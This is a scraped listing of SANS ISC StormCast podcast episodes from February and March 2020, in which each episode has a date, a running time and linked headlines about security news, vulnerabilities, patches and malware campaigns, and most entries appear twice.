Desktop.ini as a post-exploitation tool https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/ VMWAre Workstatation/Fusion Update https://www.vmware.com/security/advisories/VMSA-2020-0004.html Blackwater Malware Abuses Cloudflare Workers https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/ tcpdump Heap Based Buffer Over-Read https://nvd.nist.gov/vuln/detail/CVE-2018-19325 Slack Account Takevoer Bug https://hackerone.com/reports/737140
3/17/20205 minutes, 52 seconds
Episode Artwork

ISC StormCast for Monday, March 16th 2020

Phishing PDFs With Incremental Updates https://isc.sans.edu/forums/diary/Phishing+PDF+With+Incremental+Updates/25904/ VPN Access and Active Monitoring https://isc.sans.edu/forums/diary/VPN+Access+and+Activity+Monitoring/25906/ Capturing Invalid Ethernet Frames https://isc.sans.edu/forums/diary/Not+all+Ethernet+NICs+are+Created+Equal+Trying+to+Capture+Invalid+Ethernet+Frames/25896/ Cookiethief Android Cookie Stealing Malware https://securelist.com/cookiethief/96332/ SANS Security Awareness Deployment Kit for Securing Your Workforce at Home https://www.sans.org/webcasts/113875
3/16/20206 minutes, 53 seconds
Episode Artwork

ISC StormCast for Monday, March 16th 2020

Phishing PDFs With Incremental Updates https://isc.sans.edu/forums/diary/Phishing+PDF+With+Incremental+Updates/25904/ VPN Access and Active Monitoring https://isc.sans.edu/forums/diary/VPN+Access+and+Activity+Monitoring/25906/ Capturing Invalid Ethernet Frames https://isc.sans.edu/forums/diary/Not+all+Ethernet+NICs+are+Created+Equal+Trying+to+Capture+Invalid+Ethernet+Frames/25896/ Cookiethief Android Cookie Stealing Malware https://securelist.com/cookiethief/96332/ SANS Security Awareness Deployment Kit for Securing Your Workforce at Home https://www.sans.org/webcasts/113875
3/16/20206 minutes, 53 seconds
Episode Artwork

ISC StormCast for Friday, March 13th 2020

Microsoft Releases Patch for Windows SMBv3 Compression Vulnerability CVE-2020-0796 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796 Hancitor Distributed Through Coronavirus-Themed Malspam https://isc.sans.edu/forums/diary/Hancitor+distributed+through+coronavirusthemed+malspam/25892/ Avast Removes Vulnerable JavaScript Emulator From Products https://github.com/taviso/avscript Checkra1n Exploit Works Against T2 Equipped Macs https://www.idownloadblog.com/2020/03/10/luca-todesco-teases-checkra1n-hacks-on-a-t2-equipped-macbook-pros-touch-bar/
3/13/20206 minutes, 48 seconds
Episode Artwork

ISC StormCast for Friday, March 13th 2020

Microsoft Releases Patch for Windows SMBv3 Compression Vulnerability CVE-2020-0796 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796 Hancitor Distributed Through Coronavirus-Themed Malspam https://isc.sans.edu/forums/diary/Hancitor+distributed+through+coronavirusthemed+malspam/25892/ Avast Removes Vulnerable JavaScript Emulator From Products https://github.com/taviso/avscript Checkra1n Exploit Works Against T2 Equipped Macs https://www.idownloadblog.com/2020/03/10/luca-todesco-teases-checkra1n-hacks-on-a-t2-equipped-macbook-pros-touch-bar/
3/13/20206 minutes, 48 seconds
Episode Artwork

ISC StormCast for Thursday, March 12th 2020

Mystery SMB3 Flaw Update https://isc.sans.edu/forums/diary/Critical+SMBv3+Vulnerability+Remote+Code+Execution/25890/ COVID19 Malware https://blog.reasonsecurity.com/2020/03/09/covid-19-info-stealer-the-map-of-threats-threat-analysis-report/ Agent Tesla Spread by Fake Canon EOS Notification Email https://isc.sans.edu/forums/diary/Agent+Tesla+Delivered+via+Fake+Canon+EOS+Notification+on+Free+OwnCloud+Account/25884/
3/12/20205 minutes, 45 seconds
Episode Artwork

ISC StormCast for Thursday, March 12th 2020

Mystery SMB3 Flaw Update https://isc.sans.edu/forums/diary/Critical+SMBv3+Vulnerability+Remote+Code+Execution/25890/ COVID19 Malware https://blog.reasonsecurity.com/2020/03/09/covid-19-info-stealer-the-map-of-threats-threat-analysis-report/ Agent Tesla Spread by Fake Canon EOS Notification Email https://isc.sans.edu/forums/diary/Agent+Tesla+Delivered+via+Fake+Canon+EOS+Notification+on+Free+OwnCloud+Account/25884/
3/12/20205 minutes, 45 seconds
Episode Artwork

ISC StormCast for Wednesday, March 11th 2020

Microsoft Patch Tuesday https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005 https://isc.sans.edu/diary.html?storyid=25886
3/11/20205 minutes, 17 seconds
Episode Artwork

ISC StormCast for Wednesday, March 11th 2020

Microsoft Patch Tuesday https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005 https://isc.sans.edu/diary.html?storyid=25886
3/11/20205 minutes, 17 seconds
Episode Artwork

ISC StormCast for Tuesday, March 10th 2020

Malicious Spreadsheet With Data Connection and Excel 4 Macros https://isc.sans.edu/forums/diary/Malicious+Spreadsheet+With+Data+Connection+and+Excel+4+Macros/25880/ Take a Way: Exploring the Security Implications of AMD's Cache Way Predictors https://mlq.me/download/takeaway.pdf https://www.amd.com/en/corporate/product-security Google Play Store Protect Fails Security Test https://www.av-test.org/en/news/here-s-how-well-17-android-security-apps-provide-protection/
3/10/20206 minutes, 45 seconds
Episode Artwork

ISC StormCast for Tuesday, March 10th 2020

Malicious Spreadsheet With Data Connection and Excel 4 Macros https://isc.sans.edu/forums/diary/Malicious+Spreadsheet+With+Data+Connection+and+Excel+4+Macros/25880/ Take a Way: Exploring the Security Implications of AMD's Cache Way Predictors https://mlq.me/download/takeaway.pdf https://www.amd.com/en/corporate/product-security Google Play Store Protect Fails Security Test https://www.av-test.org/en/news/here-s-how-well-17-android-security-apps-provide-protection/
3/10/20206 minutes, 45 seconds
Episode Artwork

ISC StormCast for Monday, March 9th 2020

Excel Maldocs: Hidden Sheets https://isc.sans.edu/forums/diary/Excel+Maldocs+Hidden+Sheets/25876/ Wireshark 3.2.2. Released https://www.wireshark.org/docs/relnotes/wireshark-3.2.2.html Linux PPP Vulnerability https://www.kb.cert.org/vuls/id/782301/ NordVPN Vulnerablity https://www.theregister.co.uk/2020/03/06/nordvpn_no_auth_needed_view_user_payments/ Unpatched Android Devices https://www.which.co.uk/news/2020/03/more-than-one-billion-android-devices-at-risk-of-malware-threats/
3/9/20205 minutes, 30 seconds
Episode Artwork

ISC StormCast for Monday, March 9th 2020

Excel Maldocs: Hidden Sheets https://isc.sans.edu/forums/diary/Excel+Maldocs+Hidden+Sheets/25876/ Wireshark 3.2.2. Released https://www.wireshark.org/docs/relnotes/wireshark-3.2.2.html Linux PPP Vulnerability https://www.kb.cert.org/vuls/id/782301/ NordVPN Vulnerablity https://www.theregister.co.uk/2020/03/06/nordvpn_no_auth_needed_view_user_payments/ Unpatched Android Devices https://www.which.co.uk/news/2020/03/more-than-one-billion-android-devices-at-risk-of-malware-threats/
3/9/20205 minutes, 30 seconds
Episode Artwork

ISC StormCast for Friday, March 6th 2020

Survey Phish https://isc.sans.edu/forums/diary/Will+You+Put+Your+Password+in+a+Survey/25866/ Healthcare.gov Sending E-Mail Looking Like Phishing https://twitter.com/johullrich/status/1235740586717720577 Intel x86 Root of Trust: Loss of Trust https://blog.ptsecurity.com/2020/03/intelx86-root-of-trust-loss-of-trust.html Let's Encrypt Revises Revokation Plan https://community.letsencrypt.org/t/2020-02-29-caa-rechecking-bug/114591/2 Trust Me, I'm Certified Podcast https://www.giac.org/podcasts
3/6/20206 minutes, 15 seconds
Episode Artwork

ISC StormCast for Friday, March 6th 2020

Survey Phish https://isc.sans.edu/forums/diary/Will+You+Put+Your+Password+in+a+Survey/25866/ Healthcare.gov Sending E-Mail Looking Like Phishing https://twitter.com/johullrich/status/1235740586717720577 Intel x86 Root of Trust: Loss of Trust https://blog.ptsecurity.com/2020/03/intelx86-root-of-trust-loss-of-trust.html Let's Encrypt Revises Revokation Plan https://community.letsencrypt.org/t/2020-02-29-caa-rechecking-bug/114591/2 Trust Me, I'm Certified Podcast https://www.giac.org/podcasts
3/6/20206 minutes, 15 seconds
Episode Artwork

ISC StormCast for Thursday, March 5th 2020

MSFT Subdomain Takeover https://vullnerability.com/blog/microsoft-subdomain-account-takeover Homoglyph Attacks in the News Again https://www.soluble.ai/blog/public-disclosure-emoji-to-zero-day Coronavirus Phish https://twitter.com/JCyberSec_/status/1234806881195044865
3/5/20206 minutes, 46 seconds
Episode Artwork

ISC StormCast for Thursday, March 5th 2020

MSFT Subdomain Takeover https://vullnerability.com/blog/microsoft-subdomain-account-takeover Homoglyph Attacks in the News Again https://www.soluble.ai/blog/public-disclosure-emoji-to-zero-day Coronavirus Phish https://twitter.com/JCyberSec_/status/1234806881195044865
3/5/20206 minutes, 46 seconds
Episode Artwork

ISC StormCast for Wednesday, March 4th 2020

Introduction to EvtxEcmd (Evtx Explorer) https://isc.sans.edu/forums/diary/Introduction+to+EvtxEcmd+Evtx+Explorer/25858/ Let's Encrypt Revoking Certificates https://community.letsencrypt.org/t/revoking-certain-certificates-on-march-4/114864 Using Smart Devices in the Home Securely (NCSC Version) https://www.ncsc.gov.uk/guidance/smart-devices-in-the-home Ransomware and Cloud Backups https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/ SANS Coronavirus Training Guarantee https://www.sans.org/training-guarantee
3/4/20206 minutes, 18 seconds
Episode Artwork

ISC StormCast for Wednesday, March 4th 2020

Introduction to EvtxEcmd (Evtx Explorer) https://isc.sans.edu/forums/diary/Introduction+to+EvtxEcmd+Evtx+Explorer/25858/ Let's Encrypt Revoking Certificates https://community.letsencrypt.org/t/revoking-certain-certificates-on-march-4/114864 Using Smart Devices in the Home Securely (NCSC Version) https://www.ncsc.gov.uk/guidance/smart-devices-in-the-home Ransomware and Cloud Backups https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/ SANS Coronavirus Training Guarantee https://www.sans.org/training-guarantee
3/4/20206 minutes, 18 seconds
Episode Artwork

ISC StormCast for Tuesday, March 3rd 2020

SSL Distribution by Country https://isc.sans.edu/forums/diary/Secure+vs+cleartext+protocols+couple+of+interesting+stats/25854/ Checkpoint Evasion Encyclopedia https://research.checkpoint.com/2020/cpr-evasion-encyclopedia-the-check-point-evasion-repository/ OWASP Threat Dragon https://github.com/mike-goodwin/owasp-threat-dragon-desktop SANS Free Things https://sans.org/free
3/3/20205 minutes, 46 seconds
Episode Artwork

ISC StormCast for Tuesday, March 3rd 2020

SSL Distribution by Country https://isc.sans.edu/forums/diary/Secure+vs+cleartext+protocols+couple+of+interesting+stats/25854/ Checkpoint Evasion Encyclopedia https://research.checkpoint.com/2020/cpr-evasion-encyclopedia-the-check-point-evasion-repository/ OWASP Threat Dragon https://github.com/mike-goodwin/owasp-threat-dragon-desktop SANS Free Things https://sans.org/free
3/3/20205 minutes, 46 seconds
Episode Artwork

ISC StormCast for Monday, March 2nd 2020

Show me Your Clipboard Data! https://isc.sans.edu/forums/diary/Show+me+Your+Clipboard+Data/25846/ Hazelcast IMDB Discover Scan https://isc.sans.edu/forums/diary/Hazelcast+IMDG+Discover+Scan/25850/ Microsoft Exchange Server Vulnerabilty Scans https://twitter.com/GossiTheDog/status/1232369036438233088 Tomcat Ghostcat Vulnerability https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E
3/2/20205 minutes, 6 seconds
Episode Artwork

ISC StormCast for Monday, March 2nd 2020

Show me Your Clipboard Data! https://isc.sans.edu/forums/diary/Show+me+Your+Clipboard+Data/25846/ Hazelcast IMDB Discover Scan https://isc.sans.edu/forums/diary/Hazelcast+IMDG+Discover+Scan/25850/ Microsoft Exchange Server Vulnerabilty Scans https://twitter.com/GossiTheDog/status/1232369036438233088 Tomcat Ghostcat Vulnerability https://lists.apache.org/thread.html/r7c6f492fbd39af34a68681dbbba0468490ff1a97a1bd79c6a53610ef%40%3Cannounce.tomcat.apache.org%3E
3/2/20205 minutes, 6 seconds
Episode Artwork

ISC StormCast for Friday, February 28th 2020

Ultrasonic Triggers for Cellphone Assistants. https://source.wustl.edu/2020/02/surfing-attack-hacks-siri-google-with-ultrasonic-waves/ Comparing Information Leakage from Different Browsers https://www.scss.tcd.ie/Doug.Leith/pubs/browser_privacy.pdf Cloud Snooper Attack https://news.sophos.com/en-us/2020/02/25/cloud-snooper-attack-bypasses-firewall-security-measures/
2/28/20205 minutes, 33 seconds
Episode Artwork

ISC StormCast for Friday, February 28th 2020

Ultrasonic Triggers for Cellphone Assistants. https://source.wustl.edu/2020/02/surfing-attack-hacks-siri-google-with-ultrasonic-waves/ Comparing Information Leakage from Different Browsers https://www.scss.tcd.ie/Doug.Leith/pubs/browser_privacy.pdf Cloud Snooper Attack https://news.sophos.com/en-us/2020/02/25/cloud-snooper-attack-bypasses-firewall-security-measures/
2/28/20205 minutes, 33 seconds
Episode Artwork

ISC StormCast for Thursday, February 27th 2020

Kr00k WiFi Attack https://www.eset.com/int/kr00k/ Impersonating LTE Users https://imp4gt-attacks.net/ Zyxel RCE Vulnerablity https://www.kb.cert.org/vuls/id/498544/
2/27/20206 minutes, 48 seconds
Episode Artwork

ISC StormCast for Thursday, February 27th 2020

Kr00k WiFi Attack https://www.eset.com/int/kr00k/ Impersonating LTE Users https://imp4gt-attacks.net/ Zyxel RCE Vulnerablity https://www.kb.cert.org/vuls/id/498544/
2/27/20206 minutes, 48 seconds
Episode Artwork

ISC StormCast for Wednesday, February 26th 2020

Fraudulant Paypal Charges (links in German) https://twitter.com/iblueconnection/status/1232259071602044928 https://www.heise.de/security/meldung/Google-Pay-Luecke-in-virtuellen-Kreditkarten-erlaubt-unberechtigte-Abbuchungen-4667527.html https://stadt-bremerhaven.de/google-pay-virtuelle-paypal-kreditkarten-weisen-sicherheitsluecken-auf/ Chrome Update https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html Microsoft Public Preview For Azure AD Hybrid Environments https://techcommunity.microsoft.com/t5/azure-active-directory-identity/public-preview-of-azure-ad-support-for-fido2-security-keys-in/ba-p/1187929
2/26/20205 minutes, 33 seconds
Episode Artwork

ISC StormCast for Wednesday, February 26th 2020

Fraudulant Paypal Charges (links in German) https://twitter.com/iblueconnection/status/1232259071602044928 https://www.heise.de/security/meldung/Google-Pay-Luecke-in-virtuellen-Kreditkarten-erlaubt-unberechtigte-Abbuchungen-4667527.html https://stadt-bremerhaven.de/google-pay-virtuelle-paypal-kreditkarten-weisen-sicherheitsluecken-auf/ Chrome Update https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html Microsoft Public Preview For Azure AD Hybrid Environments https://techcommunity.microsoft.com/t5/azure-active-directory-identity/public-preview-of-azure-ad-support-for-fido2-security-keys-in/ba-p/1187929
2/26/20205 minutes, 33 seconds
Episode Artwork

ISC StormCast for Tuesday, February 25th 2020

ScrollToTextFragment Privacy Concerns in Google Chrome 80 https://github.com/WICG/ScrollToTextFragment/issues/76#issue-538137989 https://docs.google.com/document/d/1YHcl1-vE_ZnZ0kL2almeikAj2gkwCq8_5xwIae7PVik/edit#heading=h.uoiwg23pt0tx Another OpenSMTPD Vulnerability https://github.com/OpenSMTPD/OpenSMTPD/releases WhatsApp Group Invite Links in Search Engines https://twitter.com/JordanWildon/status/1230829082662842369
2/25/20207 minutes, 16 seconds
Episode Artwork

ISC StormCast for Tuesday, February 25th 2020

ScrollToTextFragment Privacy Concerns in Google Chrome 80 https://github.com/WICG/ScrollToTextFragment/issues/76#issue-538137989 https://docs.google.com/document/d/1YHcl1-vE_ZnZ0kL2almeikAj2gkwCq8_5xwIae7PVik/edit#heading=h.uoiwg23pt0tx Another OpenSMTPD Vulnerability https://github.com/OpenSMTPD/OpenSMTPD/releases WhatsApp Group Invite Links in Search Engines https://twitter.com/JordanWildon/status/1230829082662842369
2/25/20207 minutes, 16 seconds
Episode Artwork

ISC StormCast for Monday, February 24th 2020

Old Style Excel Macro Malware https://isc.sans.edu/forums/diary/Maldoc+Excel+4+Macros+in+OOXML+Format/25830/ Simple But Efficient VBScript Obfuscation https://isc.sans.edu/forums/diary/Simple+but+Efficient+VBScript+Obfuscation/25828/ Let's Encrypt Beefs Up Validation https://letsencrypt.org/2020/02/19/multi-perspective-validation.html Google Play Store Joker / Clicken Malware https://research.checkpoint.com/2020/android-app-fraud-haken-clicker-and-joker-premium-dialer/ Google Warns of Microsoft Edge https://www.heise.de/security/meldung/l-f-Google-findet-den-neuen-Edge-Browser-doof-und-unsicher-4665634.html
2/24/20206 minutes, 42 seconds
Episode Artwork

ISC StormCast for Monday, February 24th 2020

Old Style Excel Macro Malware https://isc.sans.edu/forums/diary/Maldoc+Excel+4+Macros+in+OOXML+Format/25830/ Simple But Efficient VBScript Obfuscation https://isc.sans.edu/forums/diary/Simple+but+Efficient+VBScript+Obfuscation/25828/ Let's Encrypt Beefs Up Validation https://letsencrypt.org/2020/02/19/multi-perspective-validation.html Google Play Store Joker / Clicken Malware https://research.checkpoint.com/2020/android-app-fraud-haken-clicker-and-joker-premium-dialer/ Google Warns of Microsoft Edge https://www.heise.de/security/meldung/l-f-Google-findet-den-neuen-Edge-Browser-doof-und-unsicher-4665634.html
2/24/20206 minutes, 42 seconds
Episode Artwork

ISC StormCast for Friday, February 21st 2020

Enumerating Who "Owns" a Workstation for IR https://isc.sans.edu/forums/diary/Whodat+Enumerating+Who+owns+a+Workstation+for+IR/25822/ Special Update for Adobe After Effects and Media Encoder https://helpx.adobe.com/security/products/after_effects/apsb20-09.html https://helpx.adobe.com/security/products/media-encoder/apsb20-10.html Cisco Updates https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-on-prem-static-cred-sL8rDs8 Apple To No Longer Accept Certifcates as Valid that Exceed a Lifetime of 13 months https://www.theregister.co.uk/2020/02/20/apple_shorter_cert_lifetime/ Python ReDoS Bugs https://blog.r2c.dev/posts/finding-python-redos-bugs-at-scale-using-dlint-and-r2c/
2/21/20206 minutes, 42 seconds
Episode Artwork

ISC StormCast for Friday, February 21st 2020

Enumerating Who "Owns" a Workstation for IR https://isc.sans.edu/forums/diary/Whodat+Enumerating+Who+owns+a+Workstation+for+IR/25822/ Special Update for Adobe After Effects and Media Encoder https://helpx.adobe.com/security/products/after_effects/apsb20-09.html https://helpx.adobe.com/security/products/media-encoder/apsb20-10.html Cisco Updates https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-on-prem-static-cred-sL8rDs8 Apple To No Longer Accept Certifcates as Valid that Exceed a Lifetime of 13 months https://www.theregister.co.uk/2020/02/20/apple_shorter_cert_lifetime/ Python ReDoS Bugs https://blog.r2c.dev/posts/finding-python-redos-bugs-at-scale-using-dlint-and-r2c/
2/21/20206 minutes, 42 seconds
Episode Artwork

ISC StormCast for Thursday, February 20th 2020

Sonicwall Vulnerabilities https://psirt.global.sonicwall.com/vuln-list https://blog.scrt.ch/2020/02/11/sonicwall-sra-and-sma-vulnerabilties/ SQL Server RCE Exploit https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/ Ransomware in Switzerland https://www.melani.admin.ch/melani/en/home/dokumentation/newsletter/sicherheitsrisiko-durch-ransomware.html Peripheral Vulnerabilities in Windows and Linux https://eclypsium.com/2020/2/18/unsigned-peripheral-firmware/
2/20/20205 minutes, 46 seconds
Episode Artwork

ISC StormCast for Thursday, February 20th 2020

Sonicwall Vulnerabilities https://psirt.global.sonicwall.com/vuln-list https://blog.scrt.ch/2020/02/11/sonicwall-sra-and-sma-vulnerabilties/ SQL Server RCE Exploit https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/ Ransomware in Switzerland https://www.melani.admin.ch/melani/en/home/dokumentation/newsletter/sicherheitsrisiko-durch-ransomware.html Peripheral Vulnerabilities in Windows and Linux https://eclypsium.com/2020/2/18/unsigned-peripheral-firmware/
2/20/20205 minutes, 46 seconds
Episode Artwork

ISC StormCast for Wednesday, February 19th 2020

Discovering Contents of Folders Without Permission https://isc.sans.edu/forums/diary/Discovering+contents+of+folders+in+Windows+without+permissions/25816/ Ring Enforces 2FA https://blog.ring.com/2020/02/18/extra-layers-of-security-and-control/ Iranian's finally discover VPN Vulnerabilities https://www.clearskysec.com/fox-kitten/ WordPress ThemeGrill Auth Bypass https://www.webarxsecurity.com/critical-issue-in-themegrill-demo-importer/
2/19/20206 minutes, 12 seconds
Episode Artwork

ISC StormCast for Wednesday, February 19th 2020

Discovering Contents of Folders Without Permission https://isc.sans.edu/forums/diary/Discovering+contents+of+folders+in+Windows+without+permissions/25816/ Ring Enforces 2FA https://blog.ring.com/2020/02/18/extra-layers-of-security-and-control/ Iranian's finally discover VPN Vulnerabilities https://www.clearskysec.com/fox-kitten/ WordPress ThemeGrill Auth Bypass https://www.webarxsecurity.com/critical-issue-in-themegrill-demo-importer/
2/19/20206 minutes, 12 seconds
Episode Artwork

ISC StormCast for Tuesday, February 18th 2020

More about Curl on Windows https://isc.sans.edu/forums/diary/curl+and+SSPI/25812/ WHO Warns of Coronavirus Phishing https://www.who.int/about/communications/cyber-security DUO Security / Google Identify Malicous Chrome Extensions https://duo.com/labs/research/crxcavator-malvertising-2020
2/18/20205 minutes, 41 seconds
Episode Artwork

ISC StormCast for Tuesday, February 18th 2020

More about Curl on Windows https://isc.sans.edu/forums/diary/curl+and+SSPI/25812/ WHO Warns of Coronavirus Phishing https://www.who.int/about/communications/cyber-security DUO Security / Google Identify Malicous Chrome Extensions https://duo.com/labs/research/crxcavator-malvertising-2020
2/18/20205 minutes, 41 seconds
Episode Artwork

ISC StormCast for Monday, February 17th 2020

Keep an Eye on Command-Line Browsers https://isc.sans.edu/forums/diary/Keep+an+Eye+on+CommandLine+Browsers/25804/ Old Tricks in New Bots: KBOT https://securelist.com/kbot-sometimes-they-come-back/96157/ OpenSSH Now With Fido/U2F http://www.openssh.com/txt/release-8.2
2/17/20205 minutes, 28 seconds
Episode Artwork

ISC StormCast for Monday, February 17th 2020

Keep an Eye on Command-Line Browsers https://isc.sans.edu/forums/diary/Keep+an+Eye+on+CommandLine+Browsers/25804/ Old Tricks in New Bots: KBOT https://securelist.com/kbot-sometimes-they-come-back/96157/ OpenSSH Now With Fido/U2F http://www.openssh.com/txt/release-8.2
2/17/20205 minutes, 28 seconds
Episode Artwork

ISC StormCast for Friday, February 14th 2020

Changes to Microsoft LDAP/AD And How to Cope with them https://isc.sans.edu/forums/diary/Authmageddon+deferred+but+not+averted+Microsoft+LDAP+Changes+now+slated+for+Q3Q4+2020/25800/ https://isc.sans.edu/forums/diary/March+Patch+Tuesday+is+Coming+the+LDAP+Changes+will+Change+Your+Life/25796/ SweynTooth BLE Vulnerabilities https://asset-group.github.io/disclosures/sweyntooth/ Symantec Endpoint Protection Multiple Issues https://support.symantec.com/us/en/article.SYMSA1505.html DNSSEC Root Key Signing Ceremony Delayed https://mm.icann.org/pipermail/root-dnssec-announce/2020/000121.html
2/14/20206 minutes, 44 seconds
Episode Artwork

ISC StormCast for Friday, February 14th 2020

Changes to Microsoft LDAP/AD And How to Cope with them https://isc.sans.edu/forums/diary/Authmageddon+deferred+but+not+averted+Microsoft+LDAP+Changes+now+slated+for+Q3Q4+2020/25800/ https://isc.sans.edu/forums/diary/March+Patch+Tuesday+is+Coming+the+LDAP+Changes+will+Change+Your+Life/25796/ SweynTooth BLE Vulnerabilities https://asset-group.github.io/disclosures/sweyntooth/ Symantec Endpoint Protection Multiple Issues https://support.symantec.com/us/en/article.SYMSA1505.html DNSSEC Root Key Signing Ceremony Delayed https://mm.icann.org/pipermail/root-dnssec-announce/2020/000121.html
2/14/20206 minutes, 44 seconds
Episode Artwork

ISC StormCast for Thursday, February 13th 2020

Malspam Pushes Ursnif https://isc.sans.edu/forums/diary/Malpsam+pushes+Ursnif+through+Italian+language+Word+docs/25792/ Safe Documents in Office 365 Advanced Threat Protection https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/safe-docs Wordpress GDPR Cookie Consent Plugin Vulnerability https://blog.nintechnet.com/wordpress-gdpr-cookie-consent-plugin-fixed-vulnerability/ Apple Joins Fido Alliance https://fidoalliance.org/members/ https://research.kudelskisecurity.com/2020/02/12/fido2-deep-dive-attestations-trust-model-and-security/
2/13/20206 minutes, 3 seconds
Episode Artwork

ISC StormCast for Thursday, February 13th 2020

Malspam Pushes Ursnif https://isc.sans.edu/forums/diary/Malpsam+pushes+Ursnif+through+Italian+language+Word+docs/25792/ Safe Documents in Office 365 Advanced Threat Protection https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/safe-docs Wordpress GDPR Cookie Consent Plugin Vulnerability https://blog.nintechnet.com/wordpress-gdpr-cookie-consent-plugin-fixed-vulnerability/ Apple Joins Fido Alliance https://fidoalliance.org/members/ https://research.kudelskisecurity.com/2020/02/12/fido2-deep-dive-attestations-trust-model-and-security/
2/13/20206 minutes, 3 seconds
Episode Artwork

ISC StormCast for Wednesday, February 12th 2020

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+for+February+2020/25790/ Adobe Patches https://helpx.adobe.com/security.html Ransomware Abuses Out of Date Driver https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/
2/12/202022 minutes, 15 seconds
Episode Artwork

ISC StormCast for Wednesday, February 12th 2020

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+Patch+Tuesday+for+February+2020/25790/ Adobe Patches https://helpx.adobe.com/security.html Ransomware Abuses Out of Date Driver https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/
2/12/202022 minutes, 15 seconds
Episode Artwork

ISC StormCast for Tuesday, February 11th 2020

Paypal Phish is Asking for Everything https://isc.sans.edu/forums/diary/Current+PayPal+phishing+campaign+or+give+me+all+your+personal+information/25786/ Dell SupportAssist Client Uncontrolled Search Patch Vulnerability https://www.dell.com/support/article/ro/ro/robsdt1/sln320101/dsa-2020-005-dell-supportassist-client-uncontrolled-search-path-vulnerability?lang=en Lock My PC Used By Support Scammers https://fspro.net/lock-pc/ https://www.bleepingcomputer.com/news/security/lock-my-pc-used-by-tech-support-scammers-dev-offers-free-recovery/ Insecure Docker Registries https://unit42.paloaltonetworks.com/leaked-docker-code/
2/11/20206 minutes, 23 seconds
Episode Artwork

ISC StormCast for Tuesday, February 11th 2020

Paypal Phish is Asking for Everything https://isc.sans.edu/forums/diary/Current+PayPal+phishing+campaign+or+give+me+all+your+personal+information/25786/ Dell SupportAssist Client Uncontrolled Search Patch Vulnerability https://www.dell.com/support/article/ro/ro/robsdt1/sln320101/dsa-2020-005-dell-supportassist-client-uncontrolled-search-path-vulnerability?lang=en Lock My PC Used By Support Scammers https://fspro.net/lock-pc/ https://www.bleepingcomputer.com/news/security/lock-my-pc-used-by-tech-support-scammers-dev-offers-free-recovery/ Insecure Docker Registries https://unit42.paloaltonetworks.com/leaked-docker-code/
2/11/20206 minutes, 23 seconds
Episode Artwork

ISC StormCast for Monday, February 10th 2020

Sandbox Detection Tricks and Nice Obfuscation in a Single VBScript https://isc.sans.edu/forums/diary/Sandbox+Detection+Tricks+Nice+Obfuscation+in+a+Single+VBScript/25780/ Emotet Spreads via Wifi https://www.binarydefense.com/emotet-evolves-with-new-wi-fi-spreader/ Exploit Available for sudo pwfeedback bug https://dylankatz.com/Analysis-of-CVE-2019-18634/ xiongmail/hisilicon Vulnerability https://censys.io/blog/probing-the-xiongmai-hisilicon-soc-vulnerability
2/10/20206 minutes, 32 seconds
Episode Artwork

ISC StormCast for Monday, February 10th 2020

Sandbox Detection Tricks and Nice Obfuscation in a Single VBScript https://isc.sans.edu/forums/diary/Sandbox+Detection+Tricks+Nice+Obfuscation+in+a+Single+VBScript/25780/ Emotet Spreads via Wifi https://www.binarydefense.com/emotet-evolves-with-new-wi-fi-spreader/ Exploit Available for sudo pwfeedback bug https://dylankatz.com/Analysis-of-CVE-2019-18634/ xiongmail/hisilicon Vulnerability https://censys.io/blog/probing-the-xiongmai-hisilicon-soc-vulnerability
2/10/20206 minutes, 32 seconds
Episode Artwork

ISC StormCast for Friday, February 7th 2020

Criticial Bluetooth Vulnerability in Android (CVE-2020-0022) https://insinuator.net/2020/02/critical-bluetooth-vulnerability-in-android-cve-2020-0022/ Wacom Tablets Reports Application Details to Google https://robertheaton.com/2020/02/05/wacom-drawing-tablets-track-name-of-every-application-you-open/ Bitbucket Delivers Malware https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware Realtek HD Audio Driver Package DLL Preloading https://safebreach.com/Post/Realtek-HD-Audio-Driver-Package-DLL-Preloading-and-Potential-Abuses-CVE-2019-19705
2/7/20205 minutes, 37 seconds
Episode Artwork

ISC StormCast for Friday, February 7th 2020

Criticial Bluetooth Vulnerability in Android (CVE-2020-0022) https://insinuator.net/2020/02/critical-bluetooth-vulnerability-in-android-cve-2020-0022/ Wacom Tablets Reports Application Details to Google https://robertheaton.com/2020/02/05/wacom-drawing-tablets-track-name-of-every-application-you-open/ Bitbucket Delivers Malware https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware Realtek HD Audio Driver Package DLL Preloading https://safebreach.com/Post/Realtek-HD-Audio-Driver-Package-DLL-Preloading-and-Potential-Abuses-CVE-2019-19705
2/7/20205 minutes, 37 seconds
Episode Artwork

ISC StormCast for Thursday, February 6th 2020

Fake Browser Updates installing NetSupport RAT https://isc.sans.edu/forums/diary/Fake+browser+update+pages+are+still+a+thing/25774/ Google Android Update https://source.android.com/security/bulletin/2020-02-01#Google-Play-system-updates 5 Cisco Vulnerabilities https://www.armis.com/cdpwn/
